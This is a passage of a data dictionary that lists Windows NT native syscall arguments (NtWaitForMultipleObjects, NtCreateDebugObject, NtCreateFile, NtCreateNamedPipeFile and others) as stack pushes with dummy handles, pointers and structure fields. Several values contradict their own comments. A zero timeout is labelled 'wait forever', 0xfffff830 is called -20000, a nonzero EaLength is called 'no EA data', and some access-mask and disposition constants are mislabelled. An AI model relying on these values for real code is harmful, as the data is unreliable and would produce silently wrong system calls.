"ntFunc": "NtSignalAndWaitForSingleObject", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to LARGE_INTEGER Time (dummy pointer, optional, can be None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct136", "structureValueExpectations": "Timeout interval in 100-nanosecond units, negative for relative.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN Alertable (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000446", "additionalComment": "HANDLE WaitableObject (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000447", "additionalComment": "HANDLE ObjectToSignal (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct136": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0xfffff830", "fieldComment": "Relative timeout of -20000 (2ms) in 100ns units" } ] } } }, "NtWaitForMultipleObjects": { "ntFunc": "NtWaitForMultipleObjects", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to LARGE_INTEGER TimeOut (dummy pointer, optional, can be None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct137", "structureValueExpectations": "Timeout interval in 100-nanosecond units, negative for relative.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN Alertable (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "OBJECT_WAIT_TYPE WaitType (WaitAll)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to array of HANDLEs (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG ObjectCount (waiting on 2 objects)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct137": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0xffffffffffffffd8", "fieldComment": "Relative timeout of -40 (4us) in 100ns units" } ] } } }, "NtWaitForSingleObject": { "ntFunc": "NtWaitForSingleObject", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to LARGE_INTEGER TimeOut (dummy pointer, optional, can be None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct138", "structureValueExpectations": "Timeout interval in 100-nanosecond units, negative for relative.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN Alertable (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000448", "additionalComment": "HANDLE ObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct138": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "None/zero timeout (wait forever)" } ] } } }, "NtCreateDebugObject": { "ntFunc": "NtCreateDebugObject", "pushes": [ { "value": "0x00000000", "additionalComment": "KillProcessOnExit = FALSE (default, do not kill process on exit)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES = None (default, unnamed object)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000001F", "additionalComment": "DesiredAccess = DEBUG_ALL_ACCESS (realistic example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE DebugObjectHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtDebugActiveProcess": { "ntFunc": "NtDebugActiveProcess", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE DebugObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x99994444", "additionalComment": "HANDLE ProcessHandle (dummy handle, target process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRemoveProcessDebug": { "ntFunc": "NtRemoveProcessDebug", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE DebugObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x99994444", "additionalComment": "HANDLE ProcessHandle (dummy handle, target process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateDirectoryObject": { "ntFunc": "NtCreateDirectoryObject", "pushes": [ { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES = None (default, unnamed object)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000F000F", "additionalComment": "DesiredAccess = DIRECTORY_ALL_ACCESS (realistic example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE DirectoryHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenDirectoryObject": { "ntFunc": "NtOpenDirectoryObject", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct139", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00020000", "additionalComment": "DesiredAccess = DIRECTORY_QUERY (realistic example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE DirectoryObjectHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct139": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0040", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryDirectoryObject": { "ntFunc": "NtQueryDirectoryObject", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG DataWritten (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG ObjectIndex (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "BOOLEAN IgnoreInputIndex (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN GetNextIndex (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG BufferLength (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to OBJDIR_INFORMATION DirObjInformation (dummy pointer)", "structurePointer": "OBJDIR_INFORMATION", "structureRef": "struct140", "structureValueExpectations": "Directory object information structure for output.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE DirectoryObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct140": { "type": "OBJDIR_INFORMATION", "fields": [ { "fieldName": "Name", "fieldType": "UNICODE_STRING", "fieldValue": "0xbadd0080", "fieldComment": "Pointer to UNICODE_STRING for object name (dummy pointer)" }, { "fieldName": "TypeName", "fieldType": "UNICODE_STRING", "fieldValue": "0xbadd0090", "fieldComment": "Pointer to UNICODE_STRING for type name (dummy pointer)" } ] } } }, "NtClearEvent": { "ntFunc": "NtClearEvent", "pushes": [ { "value": "0x00000E00", "additionalComment": "HANDLE EventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateEvent": { "ntFunc": "NtCreateEvent", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN InitialState (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "EVENT_TYPE EventType (NotificationEvent)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct141", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "ACCESS_MASK DesiredAccess (EVENT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE EventHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct141": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name specified)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenEvent": { "ntFunc": "NtOpenEvent", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct142", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "ACCESS_MASK DesiredAccess (EVENT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to HANDLE EventHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct142": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name specified)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtPulseEvent": { "ntFunc": "NtPulseEvent", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to LONG PreviousState (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000E00", "additionalComment": "HANDLE EventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryEvent": { "ntFunc": "NtQueryEvent", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "EventInformationLength (16 bytes, typical for EVENT_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to EVENT_BASIC_INFORMATION structure (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "EventInformationClass (EventBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE EventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtResetEvent": { "ntFunc": "NtResetEvent", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to LONG PreviousState (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000444", "additionalComment": "HANDLE EventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetEvent": { "ntFunc": "NtSetEvent", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to LONG PreviousState (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000444", "additionalComment": "HANDLE EventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetEventBoostPriority": { "ntFunc": "NtSetEventBoostPriority", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE EventHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateEventPair": { "ntFunc": "NtCreateEventPair", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (None, default for unnamed event pair)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "DesiredAccess (EVENT_PAIR_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE EventPairHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenEventPair": { "ntFunc": "NtOpenEventPair", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (None, default for unnamed event pair)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "DesiredAccess (EVENT_PAIR_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE EventPairHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtSetHighEventPair": { "ntFunc": "NtSetHighEventPair", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE EventPairHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetHighWaitLowEventPair": { "ntFunc": "NtSetHighWaitLowEventPair", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE EventPairHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetHighWaitLowThread": { "ntFunc": "NtSetHighWaitLowThread", "pushes": [], "structures": {} }, "NtSetLowEventPair": { "ntFunc": "NtSetLowEventPair", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE EventPairHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetLowWaitHighEventPair": { "ntFunc": "NtSetLowWaitHighEventPair", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE EventPairHandle (None, typical for illustrative purposes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetLowWaitHighThread": { "ntFunc": "NtSetLowWaitHighThread", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE ThreadHandle (None, typical for illustrative purposes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWaitHighEventPair": { "ntFunc": "NtWaitHighEventPair", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE EventPairHandle (None, typical for illustrative purposes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWaitLowEventPair": { "ntFunc": "NtWaitLowEventPair", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE EventPairHandle (None, typical for illustrative purposes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCancelIoFile": { "ntFunc": "NtCancelIoFile", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct143", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0x00004444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct143": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (default initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Typically zero before I/O completion" } ] } } }, "NtCreateFile": { "ntFunc": "NtCreateFile", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG EaLength (no EA data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID EaBuffer (None, no EA data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000020", "additionalComment": "ULONG CreateOptions (FILE_NON_DIRECTORY_FILE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG CreateDisposition (FILE_SUPERSEDE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000007", "additionalComment": "ULONG ShareAccess (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000080", "additionalComment": "ULONG FileAttributes (FILE_ATTRIBUTE_NORMAL)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PLARGE_INTEGER AllocationSize (dummy pointer, None for default size)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct144", "structureValueExpectations": "Allocation size in bytes, or None for default.", "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct145", "structureValueExpectations": "Status and information fields.", "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct146", "structureValueExpectations": "Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.", "pointedValue": None }, { "value": "0x0012019F", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PHANDLE FileHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct144": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "Default allocation size (0 = use default)" } ] }, "struct145": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" } ] }, "struct146": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0100", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreateMailslotFile": { "ntFunc": "NtCreateMailslotFile", "pushes": [ { "value": "0xbadd0040", "additionalComment": "PLARGE_INTEGER ReadTimeOut (dummy pointer, infinite timeout)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct147", "structureValueExpectations": "Timeout in 100-nanosecond intervals, or None for infinite.", "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG MaxMessageSize (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00010000", "additionalComment": "ULONG MailslotQuota (65536 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000020", "additionalComment": "ULONG CreateOptions (FILE_NON_DIRECTORY_FILE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct148", "structureValueExpectations": "Status and information fields.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct149", "structureValueExpectations": "Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.", "pointedValue": None }, { "value": "0x0012019F", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "PHANDLE MailslotFileHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct147": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0xFFFFFFFFFFFFFFFF", "fieldComment": "Infinite timeout" } ] }, "struct148": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" } ] }, "struct149": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0110", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreateNamedPipeFile": { "ntFunc": "NtCreateNamedPipeFile", "pushes": [ { "value": "0xbadd0080", "additionalComment": "PLARGE_INTEGER DefaultTimeOut (dummy pointer, infinite timeout)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct150", "structureValueExpectations": "Timeout in 100-nanosecond intervals, or None for infinite.", "pointedValue": None }, { "value": "0x00010000", "additionalComment": "ULONG OutBufferSize (65536 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00010000", "additionalComment": "ULONG InBufferSize (65536 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000000FF", "additionalComment": "ULONG MaxInstances (255 instances)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN NonBlocking (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN ReadModeMessage (TRUE, message mode)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN WriteModeMessage (TRUE, message mode)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000020", "additionalComment": "ULONG CreateOptions (FILE_NON_DIRECTORY_FILE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG CreateDisposition (FILE_SUPERSEDE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000007", "additionalComment": "ULONG ShareAccess (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct151", "structureValueExpectations": "Status and information fields.", "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct152", "structureValueExpectations": "Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.", "pointedValue": None }, { "value": "0x0012019F", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "PHANDLE NamedPipeFileHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct150": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0xFFFFFFFFFFFFFFFF", "fieldComment": "Infinite timeout" } ] }, "struct151": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" } ] }, "struct152": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0120", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": 